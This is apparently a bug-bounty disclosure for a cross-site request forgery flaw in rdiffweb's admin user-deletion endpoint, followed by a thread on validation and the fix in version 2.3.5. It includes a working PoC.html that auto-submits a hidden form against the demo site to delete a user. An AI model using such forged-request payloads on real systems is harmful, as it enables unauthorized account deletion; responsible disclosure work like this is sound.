Cross-Site Request Forgery (CSRF) in ikus060/rdiffweb

Valid

Reported on

Sep 11th 2021


✍️ Description

Hello dear Rdiffweb team.

I found a CSRF vulnerability on following endpoint that attackers able to Delete users with PoC.html

🕵️‍♂️ Proof of Concept

  1. user with right privileges should be logged in Firefox or Safari.

  2. Users go to a website that contain PoC.html

3.after visiting attacker's website a user with username aaaa will be deleted. // PoC.html

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://rdiffweb-demo.ikus-soft.com/admin/users" method="POST">
      <input type="hidden" name="action" value="delete" />
      <input type="hidden" name="username" value="aaaa" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

Also attacker can send multiple request with help of Iframes.

Fix

I just want to suggest you to set a CSRF token for this form.

Ziding Zhang
3 months ago

Admin


Hey amammad, I've opened a PR on the repo asking for a security policy with email.

amammad
3 months ago

Researcher


@admin Hey Zi

maintainer already put own email for your pull request

https://github.com/ikus060/rdiffweb/pull/73

Ziding Zhang
2 months ago

Admin


Hey amammad, I've updated the PR for him. Thanks.

amammad
2 months ago

Researcher


@admin hey admin

They already put theier email in 25 days ago !!!

We have contacted a member of the ikus060/rdiffweb team and are waiting to hear back 2 months ago
Jamie Slome
2 months ago

Admin


Sorted! ♥️

Patrik Dufresne validated this vulnerability 2 months ago
amammad has been awarded the disclosure bounty
The fix bounty is now up for grabs
Patrik Dufresne confirmed that a fix has been merged on fc257f 2 months ago
The fix bounty has been dropped
Patrik Dufresne
2 months ago

Maintainer


Changes are made and releases as 2.3.5

amammad
2 months ago

Researcher


There Are other reports for other endpoints, please validate them too.

you can see them in the reports section

Patrik Dufresne
2 months ago

Maintainer


@amammad

I've added CSRF everywhere applicable. I'm not sure I've miss any endpoint

amammad
2 months ago

Researcher


Can I ask that do you check these reports ?

https://www.huntr.dev/bounties/5ee61635-4a57-41f6-9536-a07737e99db2/ https://www.huntr.dev/bounties/74c976cf-cf31-4a51-992b-45b8c488c4f2/ https://www.huntr.dev/bounties/b558dfb2-38a4-4ea7-a53f-6808065337aa/ https://www.huntr.dev/bounties/740ac468-47b3-4937-98ef-01e8e5e1382b/

I test all parts of application and I found the endpoints that don't have any CSRF protection.

amammad
2 months ago

Researcher


The date of all these reports are same.

amammad
2 months ago

Researcher


I mean that I report for every endpoint that was vulnerable to CSRF one report.